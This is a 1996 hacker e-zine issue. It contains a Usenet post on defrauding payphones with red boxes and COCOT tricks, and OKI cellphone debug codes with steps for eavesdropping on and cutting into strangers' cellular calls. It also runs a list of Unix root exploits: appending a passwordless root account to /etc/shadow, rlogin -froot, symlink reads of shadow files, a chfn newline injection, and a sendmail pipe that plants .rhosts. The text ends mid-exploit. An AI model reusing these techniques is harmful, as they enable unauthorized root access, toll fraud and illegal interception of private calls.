Masters of Technology

Masters of Technology
Present

The MOT Newsletter!
Issue 2, February 1, 1996

------------------------------------------------------------------------------

Editor: The Godfather

------------------------------------------------------------------------------

DISCLAIMER!!!

This file is written for informational purposes only. I, The Godfather,
or the writers, do not take any responsibility for any actions taken by
readers of this magazine, unless specifically said in the respective
article.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Contents:

Introduction

800 BBS Risks, Telsa, Phile 1 of 7

Making Free Calls
From a Payphone, [email protected], Phile 2 of 7

OKI Debug Info, The Godfather, Phile 3 of 7

Root in 5 minutes, The Godfather, Phile 4 of 7

Full (No) Armor, The Godfather, Phile 5 of 7

950-xxxx Scan, The Godfather, Phile 6 of 7

800 Services
Part One of Two, The Godfather, Phile 7 of 7

BBS Update

Distribution Info

Editorial

Letters

MOT News

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Introduction
By: The Godfather

Welcome to the Masters of Technology newsletter. We aren't another lame
group, just a publisher of information such as Phrack. Anyone can write for
MOT, just send me the article at "[email protected]", or at the L0pht BBS.
Some of these philes were not sent to me, but I grabbed them and since
they hadn't been published anywhere else, decided to throw them in.

Greetz to: Cyber Link, Mind Rape (I'll call, I'll call, give me time),
Redboxchillipepper (You cool guy you), Mercenary, Mr. X (
where the hell are you?), Crawl, Dark Tangent

Affilz: You think this is a warez newsletter? Jeez... BTW, I want to
be in the PLA so I can be a cool d00d, and distrubute k-radical
PLA business cards all over town, and slaughter innocent gerbils.

Other mags
to read: Because I didn't start this magazine to DRAW readers from any
other magazines, I'll put in other mags I think are well worth
your time. For humor and phreaking, read the Phone Losers of
America. Their current issue is #38 I believe. For ALL sorts
of subjects, read Phrack. Currently the issue is #47. These
are the more currently updated mags that are electronic and
are free.

Articles
for MOT
issue 3: If I have time, I'll put together one on the Stromberg-Carlson
DCO 17 switch. That is the switch we have in my area. I am
going to have to call this MOTT (Masters of _Telephone_
Technology) if I don't get more (or any) hacking articles.
Send those along. Send me boards to put up in our BBS Update,
I had to keep along the same ones. Look for a good article
in MOT #3, but I'm not telling you the subject :)

Grr. Send me articles. Jeez, how come Phrack gets all the fucking articles.
Doesn't anyone write stuff anymore? I get tired of seeing my name on every
article in the mag. I guess Phrack isn't doing real well either. Oh well.
I'll continue putting out this magazine articles or not, but if you get
tired of my articles, fucking send me some.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

800 BBS Risks
By: Telsa
Phile 1 of 7

A word to the wise :

Originally I wrote a textfile called 800-BBS.TXT. wihch explained how to
setup and 800 number to your BBS. A warning, THIS IS NOT SAFE anylonger.
AT&T has caught on, and in addition to veryifing that you actually ordered
the service, now they call you in a week to verify again, if they get a
Modem or Fax machine they find out who owns the local number [the BBS] and
calls them up, and even if you deny it, they can still make you pay the
fee. It is very expensive and AT&T aint fucking around any longer. They
are busting boards now left and right, so if you wanna take the risq and do
it, be my guest,just keep in mind, there is now a 80% chance of getting busted
Also AT&T logs every call coming into a BBS [8oo number] and even tho they
have never done it to me, they might call to ask if you know the person at
the 800. There is alot of ppl who have read my textfile and have been
enlightened into how to do it, but you really didnt expect that AT&T was
going to let this go on forever, did you?

I really dont care if you read this and care or not, im just warning
you becuz a few friends of mine who have used this method have had to pay
outstanding bills of 10,000 dollars, no joke.. So i warned you, do whatever

Tesla

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Making Free Calls from a Payphone
By: [email protected]
Phile 2 of 7

From news.uiowa.edu!red.weeg.uiowa.edu!jhentzel Mon Sep 18 00:22:35 1995
Path: news.uiowa.edu!red.weeg.uiowa.edu!jhentzel
From: [email protected] (J. Hentzel)
Newsgroups: alt.2600
Subject: Re: Pay Fones
Date: 18 Sep 1995 05:14:02 GMT
Organization: University of Iowa, Iowa City, IA, USA
Lines: 82
Distribution: world
Message-ID: <[email protected]>
References: <[email protected]>
NNTP-Posting-Host: red.weeg.uiowa.edu
X-Newsreader: TIN [version 1.2 PL2]

Joey ([email protected]) wrote:
: Hi,

: Could someone tell me how to get a free phone call on a pay fone??

If the telephone is owned by the telephone company, then centralized
equipment is used to determine how much money has been insertered into
the telephone. This is done via a series of beeps sent by the pay telephone
down the phone line depending on the amount of money inserted. The phone
transmits one beep for a nickel, two for a dime, five for a quarter and so
on. The centralized equipment detects these tones and remembers how much
money has been inserted, and allows your call to proceed after the proper
amount. Due to the nature of data sent on the telephone line, the pay
telephone is not the only device able to make the proper tones. You can
simulate the "sound" of coins being put into the payphone with a device
called a 'red box'.
The net abounds with plans for red boxes, and you should look into
some of the nicer ones, as they produce clear tones which match the
payphones almost exactly. However, a perhaps easier option is to use a
microcassette recorder and an answering machine together as follows: Go to a
payphone, call your answering machine, then put several quarters into the
phone while the machine is recording your message. This will record the
sounds that quarters make when they are inserted into a pay telephone onto
your answering machine. Then use a microcassette recorder to play the tape
from the answering machine into the microphone of a payphone receiver
after dialing a long distance number.
In recent years, the phone companies have attempted to curtail red
boxing by making the microphone inactive on its new pay phones while it waits
for money to be inserted. This makes it impossible to simply play the tones
into the microphone and have them automatically sent out on the phone
line, and it becomes a more difficult to trick the equipment. This can
be circumvented by attaching a regular telephone to the coin line and using
it to make the call. Because the telephone companies control all billing
centrally, a normal phone will behave exactly like a payphone when
hooked to a coin line.
If the pay phone is privately owned, it is called a COCOT (Customer
Owned Coin Operated Telephone), or less commonly COPT (Customer Owned Pay
Telephone) These payphones are not affiliated with the telephone company,
so they cannot use the centralized money detection system and must do the
work internally. Some COCOTs are very easy to defraud. The common method is
as follows:
The FCC requires that 800 numbers be dialable for free from any
payphone (this includes COCOTs) on the belief that this will allow all long
distance companies to be accessible from any phone. You can use this
regulation against some COCOTs by dialing an 800 number and waiting until the
person/machine hangs up. Most switches will return the dialtone at this
time and you are free to make any calls anywhere (for free) because the
phone still thinks you are on the 800 number. Actually, you can dial any
number, with numbers that do not require a coin deposit being the obvious
preference (0, etc) and wait until you are hung up on. The 'standard' number
is 800 LOAN YES, which sometimes does not work, but there are many numbers
with brief messages that disconnect you, we'll always have operators!
You will find that almost all COCOTs respond differently to 800
numbers that hang up on you. The vulnerable ones I have found allow me to
hear about one second of dialtone before muting it out. If you begin
dialing your number while the dialtone is audible it will work perfectly
and connect you for free. You may need a Radio Shack tone dialer to make
the DTMF tones to dial the phone if its keypad is turned off or does not
make the real tones. These are relatively common practises and are easily
bypassed with a simple tone dialer. You will probably find that most
COCOTs will let you hear only dead air after the number hangs up on you,
and after 30 seconds the recording "If you'd like to make a call..."
comes on.
People posting the 800 method are often ridiculed because this
hack is so old that it supposedly never works anymore. I personally have
found three COCOTs vulnerable to this problem, it mostly depends on where you
find your COCOTs. Super Markets are a good place. Many of them have two
or more COCOTs there and most are vulnerable to the hang up trick.
Because the COCOT is not owned by the telephone company, it has a
normal telephone line and does all billing internally. Payphones owned by
the telephone company are just normal phones that make special tones
when money is put into them. A regular (non-pay) telephone connected to a coin
line will still ask for "Three Dollars and Ten Cents" to be inserted for a
long distance call. Obviously, this is not true for the COCOT. If you bypass
the phone, by connecting your own phone to its telephone line you can dial
long distance just as you would on any phone.
Many COCOTs are very intelligent these days, and the they are
rarely the easy target they once were. Your best bet is probably to red
box off a telco phone. Its easier, and its less likely ever to be detected.

Joe

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

OKI Debug Mode Info
By: The Godfather
Phile 3 of 7

Note: Some of this information came from The L0pht, but I expanded on it
quite a bit.

To enter debug mode:

Power the phone up. Wait for PowerOn msg. Hit 7 and 9 together.
Then hit Menu, Snd, End, Rcl, Sto, Clr. Phone says "good timing!!!"
Debugger is now enabled, but phone works normally. Hit 1 and 3
together to halt phone and enter debugger. Everything on display
lights up. Hit Clr until you get status display.

Now you can execute commands listed below. For example to reboot phone
enter #, 0, 2, Snd. Commands all start with # and end with Snd. Some
take arguments.

You can use #25, to display memory in EEPROM, hit # and * to go up and down
in memory, Clr to exit. Hex chars are entered as "*n", like *1=A, *2=B, etc.

SUSPEND #01 Performs Initialization
RESTART #02 Terminates the test mode
STATUS #03 Shows current status of TRU
RESET #04 Resets the autonomous timer
TURNAROUND #05 ? Returns Data Bytes following command to the Test Set.
INIT #06 Initialize the TRU to following states:
Carrier Off, Attenuation - 0db, Receive Audio Muted
Transmit Audio Muted, Signalling tone off,
Autonomous timer reset, SAT off, and DTMF off
CARRIER ON #07 Turns the carrier on
CARRIER OFF #08 Turns the carrier off
LOAD SYNTH #09XXXX Sets the synthesizer to channel XXXX
SET ATTN #10X Set the RF power attenuation to X
0=0db, 7=-28 db (in steps of -4db thru 7)
RXMUTE #11 Mutes the receive audio
RXUNMUTE #12 Unmutes the receive audio
TXMUTE #13 Mutes the transmit audio
TXUNMUTE #14 Unmutes the transmit audio
RESETOFF #15 Discontinues resetting of autonomous timer
STON #16 Transmits a continuous signalling tone
STOFF #17 Stops transmission of signalling tone
SETUP #18 Transmits a 5 word RCC message (fixed text pattern)
VOICE #19 Transmits a 2 word (RCC) RVC message (fixed test pattern)
RCVSU #20 Receives a 2 word FCC message (cancel with 0x38)
RCVVC #21 Receives a 1 word (FCC) FVC message (cancel with 0x38)
SEND-NAM #22 Returns the information contained in the NAM
VERSION #23
SEND-SN #24
MEM #25XXXX Displays the resident memory data at XX
00XX=in micro, XXXX=EEPROM
WSTS #28 Count 1 word messages on CC, until TERMINATE
WSTV #29 Count 1 word messages on VC, until TERMINATE
SATON #32X Enable the transmission of SAT X
0= 5970 Hz, 1=6000 Hz, 2=6030 Hz
SATOFF #33 Disables the transmission of SAT
CDATA #34<60> Transmits 5 word RCC message (30 bytes)
HITNON #35 Activates the 1150Hz tone to receive audio line
HITNOFF #36 Deactivates the 1150Hz tone
LOTNON #37 Activates the 770Hz tone to receive audio line
LOTNOFF #38 Deactivates the 770Hz tone
DTMFON #42XX Enable the transmission of DTMF frequency XX[2]
DTMFOFF #43 Disable the transmission of DTMF
? #44
? #45
? #46
? #47
? #48
? #51
- #52<xx>

? #53
- #54XXXXZZ Write HEX (ZZ) into ADDRESS $XXXX
if 00XXZZ then store #$YY in MicoRAM $XX
- #56 Return Value stored in $BEBB
? #60
? #62
? #63
RCVSU #64 Receives a 2 word FCC message (duplicate of cmd #20 CMD Compress Tx Mute Rx Mute
--- -------- ------- -------
40 on unmuted unmuted
41 off unmuted unmuted
42 on muted unmuted
43 off muted ummuted
44 on unmuted muted
45 off unmuted muted
46 on muted muted
47 off muted muted
? #72 [pulls something, outputs 1 word!?!]
? #73<arg>

Scans channels,...

#73 XXXX xxxx YY

XXXX = Start channels scan
xxxx = End channels
yy = Time

? #74
- #75 Enable Handsfree (disable spkr)
- #76 Disable Handsfree (enable spkr)
- #77 Turns on Loudspeaker near mic
- #79
? #80
? #81
? #84
? #85

Okay, now to the stuff you can actually DO with this information. I actually
figured out how to listen without help, but Dark Tangent and B-String (or
was it G-String) on the Defcon Voice Bridge told me how to actually break
in the cellular conversation.

Listening to people:

#12
#14 - This sets up the phone, unmutes audio, turns on speaker
#76

#73xxxxxxxx02 - Scans the cellular channels.

When you scan for channels, the 02 tacked on the end says to pause 2 seconds
between channels. Pressing "#" pauses at the current channel, "#" continues
after you have paused, "*" goes to the beginning of the scan.

Breaking into the conversation:

#12
#14
#670 - Sets up the phone. Unmutes, turns on mic, turns on carrier
#77
#100

#07 - To speak into phone. Depending on where you are in relation
to the speakers, this might not work.

#08 - Stop talking to them

Don't abuse this, I don't want any recalls, or new phones without this neat
little debug mode. This has been tested with the OKI 900 and 1325
phones.

Other things:

In my area, there are channels (0350, 0353) that make a warbling sound.
They do it always. I have no explanation for that, but make note of things
like that, they could be open for exploration.

Don't think you will get multitudes of computer passwords or "secret"
information listening to people, usually it is EXTREMELY boring. You can
always laugh at some bitch when she breaks up with her boyfriend, or at
some man talking to his wife about eating her pussy, but I have scanned a
LONG time, and the most I got was a phone number to another cellular phone.
Whoopie, big deal.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Getting Root in 5 Minutes
By: The Godfather
Phile 4 of 7

Finally a hacking phile. Sort of. Although this is pretty elementary
information, I haven't seen it elsewhere, so maybe some people will learn
something. Anyway the title is pretty much self explanatory, and if you
have more bugs, send them here.

Type of System: Unix
Versions: All?
Description: Files owned by root with write/execute permissions to all
can be changed into a root shell by coping /bin/sh over
the file.
Example:

% ls -l
% -rwxrwx-wx 1 root 31337 Jan 5 19:12 foobar
% cp /bin/sh foobar
% foobar
#

Type of System: AIX
Versions: all?
Description: tprof with the -x parameter executes programs with suid 0
Example:

% tprof -x /bin/sh
#

Type of System: AIX
Versions: 2.2.1
Description: /etc/shadow is writeable
Example:

% echo "rewt::0:0:blahness:/:/bin/sh" >> /etc/shadow
% telnet localhost
Trying...
Connected to haqd.com.
Escape character is '^]'.

login: rewt

#

Type of System: AIX
Versions: 3.x.x
Description: rlogind has hole
Example:

% rlogin localhost -l -froot
#

Type of System: BSD, Ultrix
Versions: 4.2 and 3.0 respectively
Description: symbolic links broken, view any file
Example:

% ln -s /etc/shadow /home/haquer/.plan
% finger haquer

Login: haquer Name: hacker
Directory: /home/haquer Shell: /bin/csh
Last Login Fri Apr 13 16:10 (CST) on tty01
No Mail.
<contents of /etc/shadow>

Type of System: Dynix, Ultrix
Versions: 3.0.14 and 2.x respectively
Description: sendmail bug, reads any file
Example:

$ sendmail -C /etc/shadow
<contents of /etc/shadow>

Type of System: Dynix, Irix
Versions: all?
Description: rsh bug executes commands as root
Example:

$ rsh localhost -l "" /bin/sh

#

Type of System: HP/UX
Versions: 7.0-
Description: chfn accepts newlines
Example:

% chfn -f haquer^Mrewt::0:0::/:/bin/sh
% rlogin localhost -l rewt
Warning: .lastlogin not found.
#

Type of System: UNIX
Versions: SunOS, others
Description: sendmail problem
Example:

% telnet host.com 25
220 host.com SunOS Sendmail 8.6.1 #5 ready at Fri, 12 May 95 02:10 (CST)
VRFY decode
250 <|/usr/bin/uudecode>
MAIL FROM: bin
250 <bin> ... Sender Okay
RCPT TO: decode
250 <decode> ... Recipient Okay
DATA
354 Enter mail, end with "." on a line by itself
begin 644 /bin/.rhosts
$*R K"O\

end